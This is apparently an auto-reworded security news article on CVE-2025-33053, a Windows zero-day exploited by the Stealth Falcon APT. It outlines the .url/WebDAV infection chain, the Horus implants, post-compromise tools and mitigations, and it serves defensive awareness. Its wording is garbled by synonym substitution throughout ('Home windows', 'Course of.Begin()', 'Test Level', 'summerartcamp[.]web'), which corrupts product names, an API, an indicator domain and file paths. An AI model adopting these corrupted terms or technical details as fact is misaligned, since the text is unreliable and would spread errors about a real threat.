A vital zero-day vulnerability in Microsoft Home windows, designated CVE-2025-33053, has been actively exploited by the superior persistent risk (APT) group Stealth Falcon.
The flaw, enabling distant code execution (RCE) by way of manipulation of a system’s working listing, was addressed by Microsoft in its June 2025 Patch Tuesday updates following CPR’s accountable disclosure. Under is a technical breakdown of the assault and its implications.
Discovery and Exploitation of CVE-2025-33053
In March 2025, CPR recognized an tried cyberattack concentrating on a Turkish protection firm.
The assault leveraged a malicious .url file, possible delivered through spear-phishing emails, to use CVE-2025-33053.
This vulnerability permits attackers to govern the working listing of legit Home windows instruments, similar to iediagcmd.exe, to execute malicious information hosted on an attacker-controlled WebDAV server.
The .url file, named TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.url, redirected the execution of iediagcmd.exe to a malicious route.exe on a WebDAV server (summerartcamp[.]web@ssl@443/DavWWWRootOSYxaOjr). By altering the working listing, the attacker ensured that Course of.Begin() prioritized the malicious executable over the legit system32 model.
This novel approach, a primary for executable-based WebDAV assaults, underscores Stealth Falcon’s revolutionary strategy to exploiting system utilities.
Stealth Falcon, also referred to as FruityArmor, has been energetic since not less than 2012, concentrating on authorities and protection sectors within the Center East and Africa, together with Turkey, Qatar, Egypt, and Yemen.
Based on Test Level report, the group is understood for buying zero-day exploits and deploying refined, custom-built payloads.
Their newest marketing campaign introduces the Horus Agent, a {custom} implant constructed on the open-source Mythic C2 framework, named after the Egyptian falcon-headed god.
An infection Chain
.webp)
- A phishing e-mail delivers a malicious .url file, typically inside a ZIP archive, disguised as a legit doc.
- This file exploits CVE-2025-33053, manipulating iediagcmd.exe to run a dangerous route.exe from a WebDAV server.
- The assault deploys Horus Loader, a C++-based loader protected by Code Virtualizer, which evades detection by way of anti-analysis methods like handbook mapping of kernel32.dll and ntdll.dll and scanning for 109 antivirus processes from 17 distributors.
- It distracts victims by decrypting and displaying a decoy PDF, similar to TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.
- The loader makes use of IPfuscation to decode a payload from IPv6 addresses, injecting it into msedge.exe utilizing ZwAllocateVirtualMemory, ZwWriteVirtualMemory, and NtResumeThread.
- The Horus Agent, the ultimate payload, employs {custom} OLLVM obfuscation with string encryption (shift cipher, -39) and management move flattening, together with API hashing to resolve imports dynamically.
- It communicates with command-and-control servers through AES-encrypted HTTP requests, secured with HMAC-SHA256, utilizing as much as 4 domains and a killswitch date of December 31, 2099.
- Supported instructions embody system enumeration (survey) and stealthy shellcode injection (shinjectchunked).
The assault employs a multi-stage an infection chain involving Spayload, a C++ Mythic implant with superior capabilities.
Stealth Falcon’s toolkit consists of a number of undocumented instruments for post-compromise operations.
The DC Credential Dumper targets NTDS.dit, SAM, and SYSTEM information by accessing a digital disk at C:ProgramDatads_notifier_0.vhdx utilizing the DiscUtils library, compressing the information right into a ZIP archive named ds_notifier_2.vif for exfiltration.
The Passive Backdoor, usrprofscc.exe, is a C-based software that operates as a service (UsrProfSCC) with admin privileges, listening for AES-encrypted shellcode payloads.
The Customized Keylogger, StatusReport.dll, injects into dxdiag.exe, logging keystrokes to an RC4-encrypted file at C:WindowsTemp~TNpercentLogName%.tmp.
Mitigation and Suggestions
Microsoft’s patch for CVE-2025-33053 is now accessible, and organizations are urged to use it instantly. CPR recommends:
- Patching Techniques: Replace Home windows to mitigate the WebDAV vulnerability.
- Phishing Consciousness: Practice workers to acknowledge spear-phishing emails with suspicious attachments or hyperlinks.
- Community Monitoring: Look ahead to WebDAV-related visitors to domains like summerartcamp[.]web or mystartupblog.com.
- Endpoint Safety: Deploy options to detect LOLBin abuse and unauthorized course of injections.
The exploitation of CVE-2025-33053 by Stealth Falcon highlights the group’s technical sophistication and concentrate on high-value targets within the Center East.
By combining zero-day exploits, {custom} implants, and evasive methods, the group poses a big risk to regional safety. Organizations ought to prioritize patching and proactive monitoring to counter this evolving risk.
Discover this Information Attention-grabbing! Observe us on Google Information, LinkedIn, & X to Get Instantaneous Updates
